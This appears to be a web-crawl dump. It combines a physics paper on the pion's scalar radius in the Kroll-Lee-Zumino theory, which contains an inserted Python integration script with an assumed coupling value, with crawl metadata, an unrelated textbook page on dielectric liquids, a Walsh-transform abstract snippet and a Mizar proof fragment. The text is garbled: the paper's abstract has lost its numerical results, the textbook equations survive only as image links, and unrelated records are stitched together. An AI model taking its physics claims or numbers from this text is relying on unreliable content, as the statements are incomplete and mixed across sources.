"Scalar radius of the pion in the Kroll-Lee-Zumino renormalizable theory\n\n# Scalar radius of the pion in the Kroll-Lee-Zumino renormalizable theory\n\nC. A. Dominguez Centre for Theoretical Physics and Astrophysics, University of Cape Town, Rondebosch 7700 Department of Physics, Stellenbosch University, Stellenbosch 7600, South Africa M. Loewe Facultad de Física, Pontificia Universidad Católica de Chile, Casilla 306, Santiago 22, Chile B. Willers Centre for Theoretical Physics and Astrophysics, University of Cape Town, Rondebosch 7700\nSeptember 1, 2019\n###### Abstract\n\nThe Kroll-Lee-Zumino renormalizable Abelian quantum field theory of pions and a massive rho-meson is used to calculate the scalar radius of the pion at next to leading (one loop) order in perturbation theory. Due to renormalizability, this determination involves no free parameters. The result is . This value gives for , the low energy constant of chiral perturbation theory, , and , where F is the pion decay constant in the chiral limit. Given the level of accuracy in the masses and the coupling, the only sizable uncertainty in this result is due to the (uncalculated) NNLO contribution.\n\nvector meson dominance, pion physics, chiral perturbation theory\n###### pacs:\n12.40.vV, 12.39.Fe, 11.30.Rd\npreprint: UCT-TP-273/08\n\nThe pion matrix element of the QCD scalar operator defines the scalar form factor of the pion FS\n\n Γπ(q2)=⟨π(p2)|JS|π(p1)⟩, (1)\n\n Γπ(q2)=Γπ(0)[1+16⟨r2π⟩sq2+...], (2)\n\nplays a very important role in chiral perturbation theory REVCPT , as it fixes , one of the low energy constants of the theory, through the relation\n\n ⟨r2π⟩s=38π2F2π[¯ℓ4−1312+O(M2π)], (3)\n\nwhere . The low energy constant , in turn, determines the leading contribution in the chiral expansion of the pion decay constant, i.e.\n\n FπF=1+(Mπ4πFπ)2¯ℓ4+O(M4π), (4)\n\nwhere F is the pion decay constant in the chiral limit. For this reason considerable effort has been devoted over the years to the determination of from scattering data together with a variety of theoretical tools (for some recent work see V1 -OLLER ). Current values OLLER appear to converge inside the range which translates into , and . Lattice QCD results LQCD span the wide range , although results with the smaller errors cluster around .\n\nIn this paper we present a next to leading order calculation of in the framework of the Kroll-Lee-Zumino (KLZ) renormalizable Abelian gauge theory of charged pions and a massive neutral vector meson KLZ . This theory provides the quantum field theory justification for the Vector Meson Dominance (VMD) ansatz VMD . It also provides a quantum field theory platform to compute corrections to VMD systematically in perturbation theory. A determination in this framework of the electromagnetic form factor of the pion in the time-like GK as well as the spacelike region CAD1 , at the one-loop level, which is in excellent agreement with data supports this assertion. In fact, due to the relative mildness of the coupling constant, and the presence of loop suppression factors, the perturbative expansion appears well behaved in spite of the strong coupling nature of the theory. The KLZ Lagrangian is given by\n\n LKLZ = ∂μϕ∂μϕ∗−M2πϕϕ∗−14ρμνρμν+12M2ρρμρμ (5) + gρππρμJμπ +g2ρππρμρμϕϕ∗,\n\nwhere is a vector field describing the meson (), is a complex pseudo-scalar field describing the mesons, is the usual field strength tensor: , and is the current: . 
It should be stressed that in spite of the explicit presence of the mass term above, the theory is renormalizable because the neutral vector meson is coupled only to a conserved current [KLZ].

In Fig. 1 and in Fig. 2 we show, respectively, the leading-order and the next-to-leading-order contributions to the scalar form factor, Eq. (1). The cross indicates the coupling of the scalar operator to two pions. There is still another triangle graph, with two rho-mesons coupled to the scalar operator. However, since the scalar form factor vanishes identically in the chiral limit, the two rho-mesons would have to couple to the scalar operator through two pions (a coupling present in Eq. (5)). This transforms this term into a two-loop contribution, which is beyond the scope of the present work.

Using the Feynman propagator for the $\\rho$-meson [Hees]-[Quigg], and working in $d$ dimensions, the unrenormalized vertex in Fig. 2 is given by

$\\tilde{G}(q^2) = g_{\\rho\\pi\\pi}^2\\,(\\mu^3)^{2-\\frac{d}{2}} \\int \\frac{d^dk}{(2\\pi)^d}\\, \\frac{(2p_1+k)\\cdot(2p_2+k)}{[(p_1+k)^2 - M_\\pi^2 + i\\varepsilon]\\,[(p_2+k)^2 - M_\\pi^2 + i\\varepsilon]\\,(k^2 - M_\\rho^2 + i\\varepsilon)}, \\qquad (6)$

where we omitted the overall normalization. Using standard procedures (for details of a similar calculation see [CAD1]), the function in dimensional regularization is

$\\tilde{G}(q^2) = -\\frac{2\\,g_{\\rho\\pi\\pi}^2}{(4\\pi)^2}\\,(\\mu^2)^{2-\\frac{d}{2}} \\int_0^1 dx_1 \\int_0^{1-x_1} dx_2\\, \\Big\\{ \\frac{2}{\\varepsilon} - \\ln\\Big(\\frac{\\Delta(q^2)}{\\mu^2}\\Big) - \\frac{1}{2} - \\gamma + \\ln(4\\pi) + \\frac{1}{2\\Delta(q^2)}\\big[M_\\pi^2(x_1+x_2-2)^2 - q^2(x_1 x_2 - x_1 - x_2 + 2)\\big] + O(\\varepsilon) \\Big\\}, \\qquad (7)$

where $\\Delta(q^2)$ is defined as

$\\Delta(q^2) = M_\\pi^2\\,(x_1+x_2)^2 + M_\\rho^2\\,(1-x_1-x_2) - x_1 x_2\\, q^2. \\qquad (8)$

In the $\\overline{\\mathrm{MS}}$ scheme, and renormalizing the vertex function at the point $q^2 = 0$, we obtain

$G(q^2) - G(0) = -\\frac{2\\,g_{\\rho\\pi\\pi}^2}{(4\\pi)^2} \\int_0^1 dx_1 \\int_0^{1-x_1} dx_2\\, \\Big\\{ \\ln\\Big(\\frac{\\Delta(q^2)}{\\Delta(0)}\\Big) + \\frac{1}{2}\\Big[ M_\\pi^2(x_1+x_2-2)^2\\Big(\\frac{1}{\\Delta(q^2)} - \\frac{1}{\\Delta(0)}\\Big) - \\frac{q^2}{\\Delta(q^2)}\\,(x_1 x_2 - x_1 - x_2 + 2) \\Big] \\Big\\}, \\qquad (9)$

with the scalar form factor being given by

$\\Gamma_\\pi(q^2) = \\Gamma_\\pi(0)\\,[1 + G(q^2) - G(0)]. \\qquad (10)$

Details of the standard renormalization procedure for the fields, masses and coupling may be found in [CAD1]. From Eq. (9) we compute the scalar radius with the result

$\\langle r_\\pi^2 \\rangle_s = \\frac{12\\,g_{\\rho\\pi\\pi}^2}{(4\\pi)^2} \\int_0^1 dx_1 \\int_0^{1-x_1} dx_2\\, \\frac{1}{\\Delta(0)} \\Big\\{ x_1 x_2 \\Big[1 - \\frac{M_\\pi^2}{2\\Delta(0)}\\,(x_1+x_2-2)^2\\Big] + \\frac{1}{2}\\,(x_1 x_2 - x_1 - x_2 + 2) \\Big\\}. \\qquad (11)$

A numerical evaluation of this equation gives the result

$\\langle r_\\pi^2 \\rangle_s = 0.4\\ \\mathrm{fm}^2, \\qquad (12)$

where we used the value of $g_{\\rho\\pi\\pi}$ obtained from the measured $\\rho \\to \\pi\\pi$ width [PDG]. The error in this coupling, as well as in the masses, has negligible impact on the radius at the level of precision given in Eq. (12). The main uncertainty in this determination stems from the uncalculated NNLO (two-loop) contribution. Using Eqs. (3) and (4) to leading order, the result above translates into

$\\bar{\\ell}_4 = 3.4, \\qquad (13)$

and

$F_\\pi/F = 1.05. \\qquad (14)$

The result for the radius in this framework is somewhat smaller than current values obtained from $\\pi\\pi$ scattering [V1]-[OLLER], although it agrees with some of the lattice QCD results [LQCD]. It should be mentioned that in the framework of KLZ the electromagnetic square radius of the pion at NLO [CAD1] is in good agreement with the experimental value [RADIUSEM]. In the electromagnetic case, NLO refers to the correction to the tree-level result of single $\\rho$-dominance; hence this correction is relatively large, and in the right direction. In the present application the equivalent of $\\rho$-dominance is absent, as there is no elementary sigma field in the KLZ Lagrangian. One would have to resort to, e.g., the linear sigma model as in [GL], but then there is no $\\rho$ field in the model. An attempt to enlarge the KLZ theory to accommodate a sigma field does not seem a useful proposition. In fact, scalar meson dominance is probably too simplistic to be able to account for the rich and complex structure of the scalar channel.
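(Added illustration: the numerical evaluation of Eq. (11) can be reproduced with a short script. The script below is not the authors' code; the coupling value, taken here as g_ρππ ≈ 6, roughly what the measured ρ → ππ width implies, and the unit-conversion factor are our assumptions.)

```python
import numpy as np
from scipy.integrate import dblquad

M_pi, M_rho = 0.13957, 0.77549   # GeV; charged pion and rho masses
g = 6.0                          # g_rho_pi_pi; assumed value, roughly from the rho width
hbarc2 = 0.0389379               # (hbar*c)^2 in GeV^2 fm^2, converts GeV^-2 to fm^2

def Delta0(x1, x2):
    # Eq. (8) evaluated at q^2 = 0
    return M_pi**2 * (x1 + x2)**2 + M_rho**2 * (1.0 - x1 - x2)

def integrand(x2, x1):
    # curly-bracket factor of Eq. (11), divided by Delta(0)
    D = Delta0(x1, x2)
    bracket = x1 * x2 * (1.0 - M_pi**2 * (x1 + x2 - 2.0)**2 / (2.0 * D))
    return (bracket + 0.5 * (x1 * x2 - x1 - x2 + 2.0)) / D

I, _ = dblquad(integrand, 0.0, 1.0, lambda x1: 0.0, lambda x1: 1.0 - x1)
r2 = 12.0 * g**2 / (4.0 * np.pi)**2 * I * hbarc2
print("scalar radius ~ %.2f fm^2" % r2)   # compare with the 0.4 fm^2 of Eq. (12)
```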
We find that the result obtained here for the scalar radius of the pion provides additional support for the KLZ theory as a viable platform to compute corrections to VMD systematically in perturbation theory.

Acknowledgements

The authors wish to thank Heiri Leutwyler for a valuable discussion, and for his comments on the manuscript. This work has been supported in part by FONDECYT 1051067, 7070178, and by Centro de Estudios Subatomicos (Chile), and by NRF (South Africa).

## References

• (1) T. N. Truong and R. S. Willey, Phys. Rev. D 40, 3635 (1989); J. F. Donoghue, J. Gasser, and H. Leutwyler, Nucl. Phys. B 343, 341 (1990).
• (2) For reviews see e.g. S. Scherer, Adv. Nucl. Phys. 27, 277 (2003); J. Gasser, Lect. Notes Phys. 629, 1 (2004).
• (3) B. Moussallam, Eur. Phys. J. C 14, 111 (2000); G. Colangelo, J. Gasser, and H. Leutwyler, Nucl. Phys. B 603, 125 (2001); B. Ananthanarayan, I. Caprini, G. Colangelo, J. Gasser, and H. Leutwyler, Phys. Lett. B 602, 218 (2004); F. J. Yndurain, Phys. Lett. B 612, 245 (2005).
• (4) J. A. Oller and L. Roca, Phys. Lett. B 651, 139 (2007).
• (5) For a recent review of the various determinations see e.g. S. Necco, PoS LAT 2007:021, 2007, and arXiv:0710.2444.
• (6) N. M. Kroll, T. D. Lee, and B. Zumino, Phys. Rev. 157, 1376 (1967); J. H. Lowenstein and B. Schroer, Phys. Rev. D 6, 1553 (1972).
• (7) J. J. Sakurai, Ann. Phys. (N.Y.) 11, 1 (1960); ibid., Currents and Mesons, University of Chicago Press (1969).
• (8) C. Gale and J. Kapusta, Nucl. Phys. B 357, 65 (1991).
• (9) C. A. Dominguez, M. Loewe, J. I. Jottar, and B. Willers, Phys. Rev. D 76, 095002 (2007). This paper has a misprint in Eq. (15) (the sign of the first term in curly brackets should be negative), with the remaining equations being correct. The electromagnetic square radius of the pion quoted in the paper is incorrect; the corrected value is in much better agreement with data than naive (single $\\rho$) VMD.
• (10) H. van Hees, hep-th/0305076 (unpublished); H. Ruegg and M. Ruiz-Altaba, Int. J. Mod. Phys. A 19, 3265 (2004).
• (11) C. Quigg, Gauge Theories of the Strong, Weak, and Electromagnetic Interactions, Benjamin (1983).
• (12) Review of Particle Physics, Particle Data Group, J. Phys. G: Nucl. Part. Phys. 33, 1 (2006).
• (13) NA7 Collaboration, S. R. Amendolia et al., Nucl. Phys. B 277, 168 (1986).
• (14) J. Gasser and H. Leutwyler, Ann. Phys. (N.Y.) 158, 142 (1984).",
null,
"",
null,
"",
null,
""
] | [
null,
"https://dp938rsb7d6cr.cloudfront.net/static/1.71/groundai/img/loader_30.gif",
null,
"https://dp938rsb7d6cr.cloudfront.net/static/1.71/groundai/img/comment_icon.svg",
null,
"https://dp938rsb7d6cr.cloudfront.net/static/1.71/groundai/img/about/placeholder.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8501661,"math_prob":0.95047015,"size":7894,"snap":"2020-24-2020-29","text_gpt3_token_len":2106,"char_repetition_ratio":0.1269962,"word_repetition_ratio":0.03358209,"special_character_ratio":0.27007854,"punctuation_ratio":0.18379685,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9661809,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-05-29T20:08:14Z\",\"WARC-Record-ID\":\"<urn:uuid:93af2060-d6ff-4c6a-a1f4-746707368467>\",\"Content-Length\":\"331411\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:68d291fe-9db2-4ee5-922b-be7790a35060>\",\"WARC-Concurrent-To\":\"<urn:uuid:c9f6e57f-a4c3-472f-b6c5-681e383e9952>\",\"WARC-IP-Address\":\"35.186.203.76\",\"WARC-Target-URI\":\"https://www.groundai.com/project/scalar-radius-of-the-pion-in-the-kroll-lee-zumino-renormalizable-theory/\",\"WARC-Payload-Digest\":\"sha1:5Y34IEPEKWH4BW5TQFXBADZ3NPZKBNMA\",\"WARC-Block-Digest\":\"sha1:7IZCSRJC5P55SJR2MT3R7QSLHEQBV3RL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590347406365.40_warc_CC-MAIN-20200529183529-20200529213529-00062.warc.gz\"}"} |
http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/node46.html | [
"",
null,
"",
null,
"",
null,
"Next: Exercises Up: Electrostatics in Dielectric Media Previous: Clausius-Mossotti Relation\n\n# Dielectric Liquids in Electrostatic Fields\n\nConsider the behavior of an uncharged dielectric liquid placed in an electrostatic field. If",
null,
"is the pressure within the liquid when in equilibrium with the electrostatic force density",
null,
"then force balance requires that",
null,
"(599)\n\nIt follows from Equation (585) that",
null,
"(600)\n\nWe can integrate this equation to give",
null,
"(601)\n\nwhere 1 and 2 refer to two general points in the liquid. Here, it is assumed that the liquid possesses an equation of state, so that",
null,
". If the liquid is essentially incompressible (i.e.,",
null,
"constant) then",
null,
"(602)\n\nFinally, if the liquid obeys the Clausius-Mossotti relation then",
null,
"(603)\n\nAccording to Equations (554) and (604), if a sphere of dielectric liquid is placed in a uniform electric field",
null,
"then the pressure inside the liquid takes the constant value",
null,
"(604)\n\nIt is clear that the electrostatic forces acting on the dielectric are all concentrated at the edge of the sphere, and are directed radially inwards: that is, the dielectric is compressed by the external electric field. This is a somewhat surprising result because the electrostatic forces acting on a rigid conducting sphere are concentrated at the edge of the sphere, but are directed radially outwards. We might expect these two cases to give the same result in the limit",
null,
". The reason that this does not occur is because a dielectric liquid is slightly compressible, and is, therefore, subject to an electrostriction force. There is no electrostriction force for the case of a completely rigid body. In fact, the force density inside a rigid dielectric (for which",
null,
") is given by Equation (585), with the third term (the electrostriction term) missing. It is easily demonstrated that the force exerted by an electric field on a rigid dielectric is directed outwards, and approaches that exerted on a rigid conductor in the limit",
null,
".\n\nAs is well known, if a pair of charged (parallel plane) capacitor plates are dipped into a dielectric liquid then the liquid is drawn up between the plates to some extent. Let us examine this effect. We can, without loss of generality, assume that the transition from dielectric to vacuum takes place in a continuous manner. Consider the electrostatic pressure difference between a point",
null,
"lying just above the surface of the liquid in between the plates, and a point",
null,
"lying just above the surface of the liquid well away from the capacitor (where",
null,
"). The pressure difference is given by",
null,
"(605)\n\nNote, however, that the Clausius-Mossotti relation yields",
null,
"at both",
null,
"and",
null,
", because",
null,
"in a vacuum [see Equation (599)]. Thus, it is clear from Equation (585) that the electrostriction term makes no contribution to the line integral (606). It follows that",
null,
"(606)\n\nThe only contribution to this integral comes from the vacuum/dielectric interface in the vicinity of point",
null,
"(because",
null,
"is constant inside the liquid, and",
null,
"in the vicinity of point",
null,
"). Suppose that the electric field at point",
null,
"has normal and tangential (to the surface) components",
null,
"and",
null,
", respectively. Making use of the boundary conditions that",
null,
"and",
null,
"are constant across a vacuum/dielectric interface, we obtain",
null,
"(607)\n\ngiving",
null,
"(608)\n\nThis electrostatic pressure difference can be equated to the hydrostatic pressure difference",
null,
"to determine the height,",
null,
", that the liquid rises between the plates. At first sight, the above analysis appears to suggest that the dielectric liquid is drawn upward by a surface force acting on the vacuum/dielectric interface in the region between the plates. In fact, this is far from being the case. A brief examination of Equation (604) shows that this surface force is actually directed downwards. According to Equation (585), the force which causes the liquid to rise between the plates is a volume force that develops in the region of non-uniform electric field at the base of the capacitor, where the field splays out between the plates. Thus, although we can determine the height to which the fluid rises between the plates without reference to the electrostriction force, it is, somewhat paradoxically, this force that is actually responsible for supporting the liquid against gravity.\n\nLet us consider another paradox concerning the electrostatic forces exerted in a dielectric medium. Suppose that we have two charges embedded in a uniform dielectric of dielectric constant",
null,
". The electric field generated by each charge is the same as that in a vacuum, except that it is reduced by a factor",
null,
". We, therefore, expect the force exerted by one charge on the other to be the same as that in a vacuum, except that it is also reduced by a factor",
null,
". Let us examine how this reduction in force comes about. Consider a simple example. Suppose that we take a parallel plate capacitor, and insert a block of solid dielectric between the plates. Suppose, further, that there is a small vacuum gap between the faces of the block and each of the capacitor plates. Let",
null,
"be the surface charge densities on each of the capacitor plates, and let",
null,
"be the bound charge densities that develop on the outer faces of the intervening dielectric block. The two layers of bound charge produce equal and opposite electric fields on each plate, and their effects therefore cancel each other. Thus, from the point of view of electrical interaction alone there would appear to be no change in the force exerted by one capacitor plate on the other when a dielectric slab is placed between them (assuming that",
null,
"remains constant during this process). That is, the force per unit area (which is attractive) remains",
null,
"(609)\n\nHowever, in experiments in which a capacitor is submerged in a dielectric liquid the force per unit area exerted by one plate on another is observed to decrease to",
null,
"(610)\n\nThis apparent paradox can be explained by taking into account the difference in liquid pressure in the field-filled space between the plates, and the field-free region outside the capacitor. This pressure difference is balanced by internal elastic forces in the case of the solid dielectric discussed earlier, but is transmitted to the plates in the case of the liquid. We can compute the pressure difference between a point",
null,
"on the inside surface of one of the capacitor plates, and a point",
null,
"on the outside surface of the same plate using Equation (607). If we neglect end effects then the electric field is normal to the plates in the region between the plates, and is zero everywhere else. Thus, the only contribution to the line integral (607) comes from the plate/dielectric interface in the vicinity of point",
null,
". Using Equation (609), we find that",
null,
"(611)\n\nwhere",
null,
"is the normal field-strength between the plates in the absence of dielectric. The sum of this pressure force and the purely electrical force (610) yields a net attractive force per unit area",
null,
"(612)\n\nacting between the plates. Thus, any decrease in the forces exerted by charges on one another when they are immersed or embedded in a dielectric medium can only be understood in terms of mechanical forces transmitted between these charges by the medium itself.",
null,
"",
null,
"",
null,
"Next: Exercises Up: Electrostatics in Dielectric Media Previous: Clausius-Mossotti Relation\nRichard Fitzpatrick 2014-06-27"
] | [
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/next.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/up.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/prev.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img891.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1207.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1253.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1254.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1255.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1256.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1257.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1258.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1259.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1236.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1260.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1261.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1262.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1263.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img29.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img31.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1264.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1265.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1266.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img29.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img31.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1267.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1268.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img29.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1077.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1264.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img31.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img29.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1269.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1270.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1271.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1270.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1272.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1273.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1274.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1275.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1077.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1077.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1077.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1276.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1277.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img474.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1278.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1279.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img29.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img31.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img29.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1280.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1281.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/img1282.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/next.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/up.png",
null,
"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/prev.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.90223163,"math_prob":0.98643494,"size":7196,"snap":"2020-10-2020-16","text_gpt3_token_len":1626,"char_repetition_ratio":0.17074527,"word_repetition_ratio":0.05956376,"special_character_ratio":0.20956087,"punctuation_ratio":0.082170546,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99511707,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112],"im_url_duplicate_count":[null,null,null,null,null,null,null,1,null,4,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,4,null,1,null,1,null,1,null,1,null,null,null,null,null,2,null,1,null,1,null,null,null,null,null,1,null,1,null,null,null,null,null,2,null,null,null,null,null,1,null,2,null,1,null,2,null,1,null,1,null,1,null,10,null,null,null,null,null,null,null,1,null,1,null,null,null,1,null,1,null,null,null,null,null,null,null,1,null,5,null,1,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-09T11:23:18Z\",\"WARC-Record-ID\":\"<urn:uuid:f4aa7b74-c963-4170-84ba-28cdab489a8b>\",\"Content-Length\":\"22289\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:85aada8a-fed7-4cf5-af47-c983c4eecc9d>\",\"WARC-Concurrent-To\":\"<urn:uuid:dfb66991-c28c-4f05-924d-71a04880e63e>\",\"WARC-IP-Address\":\"146.6.100.132\",\"WARC-Target-URI\":\"http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/node46.html\",\"WARC-Payload-Digest\":\"sha1:ZQF2T3KWW555C6PWTRQ2UCHO5LGWM2LC\",\"WARC-Block-Digest\":\"sha1:UNWOLEQNARC2TIVSF3EMCANXPDVYB6AE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585371833063.93_warc_CC-MAIN-20200409091317-20200409121817-00486.warc.gz\"}"} |
https://kripto.famnit.upr.si/tag/walsh-transform/ | [
"# Walsh transform\n\n## Proving the conjecture of O’Donnell in certain cases and disproving its general validity\n\nFor a function $f:\\\\{−1,1\\\\}^n\\\\to \\\\{−1,1\\\\}$ the relationship between the sum of its linear Fourier coefficients $\\\\hat{f}(i)$ (defined by $\\\\hat{f}(i)≔\\\\frac{1}{2^n}\\\\sum_{x\\in \\\\{−1,1\\\\}^n} f(x)x_i$ for $i=1,2,\\\\ldots,n$ and …"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.66373664,"math_prob":0.99993837,"size":485,"snap":"2022-40-2023-06","text_gpt3_token_len":167,"char_repetition_ratio":0.0977131,"word_repetition_ratio":0.0,"special_character_ratio":0.29896906,"punctuation_ratio":0.07692308,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99949104,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-02T07:36:48Z\",\"WARC-Record-ID\":\"<urn:uuid:c1bbcb8a-2db3-417e-b59a-f23dde1798c6>\",\"Content-Length\":\"10748\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2d63382d-ae68-4d2b-91ce-7d80ff848583>\",\"WARC-Concurrent-To\":\"<urn:uuid:b18e30d9-b16d-4689-a5cd-111f79b4df32>\",\"WARC-IP-Address\":\"35.231.210.182\",\"WARC-Target-URI\":\"https://kripto.famnit.upr.si/tag/walsh-transform/\",\"WARC-Payload-Digest\":\"sha1:YQZ3VKXOOPD7OGV3G2WO6R6J63TUUGBZ\",\"WARC-Block-Digest\":\"sha1:C7W76ITDQSYBXD2MDNF6Q6ERMWZIF6IQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337287.87_warc_CC-MAIN-20221002052710-20221002082710-00734.warc.gz\"}"} |
http://mizar.uwb.edu.pl/version/current/html/proofs/stirl2_1/55_1 | [
"A2: for k being object st k in F2() holds\nex x being object st\n( x in F1() & P1[k,x] )\nproof\nlet k be object ; :: thesis: ( k in F2() implies ex x being object st\n( x in F1() & P1[k,x] ) )\n\nassume A3: k in F2() ; :: thesis: ex x being object st\n( x in F1() & P1[k,x] )\n\nF2() is Subset of NAT by Th8;\nthen reconsider k9 = k as Element of NAT by A3;\nex x being Element of F1() st P1[k9,x] by A1, A3;\nhence ex x being object st\n( x in F1() & P1[k,x] ) ; :: thesis: verum\nend;\nconsider f being Function of F2(),F1() such that\nA4: for x being object st x in F2() holds\nP1[x,f . x] from dom f = F2() by FUNCT_2:def 1;\nthen reconsider p = f as XFinSequence of F1() by AFINSQ_1:5;\ntake p ; :: thesis: ( dom p = Segm F2() & ( for k being Nat st k in Segm F2() holds\nP1[k,p . k] ) )\n\nthus ( dom p = Segm F2() & ( for k being Nat st k in Segm F2() holds\nP1[k,p . k] ) ) by ; :: thesis: verum"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.78967845,"math_prob":0.9991241,"size":507,"snap":"2019-43-2019-47","text_gpt3_token_len":205,"char_repetition_ratio":0.15904573,"word_repetition_ratio":0.33043477,"special_character_ratio":0.42998028,"punctuation_ratio":0.15151516,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9987303,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-14T06:20:14Z\",\"WARC-Record-ID\":\"<urn:uuid:146bdedd-a96e-4017-89ef-2bdbb868c148>\",\"Content-Length\":\"9575\",\"Content-Type\":\"application/http; 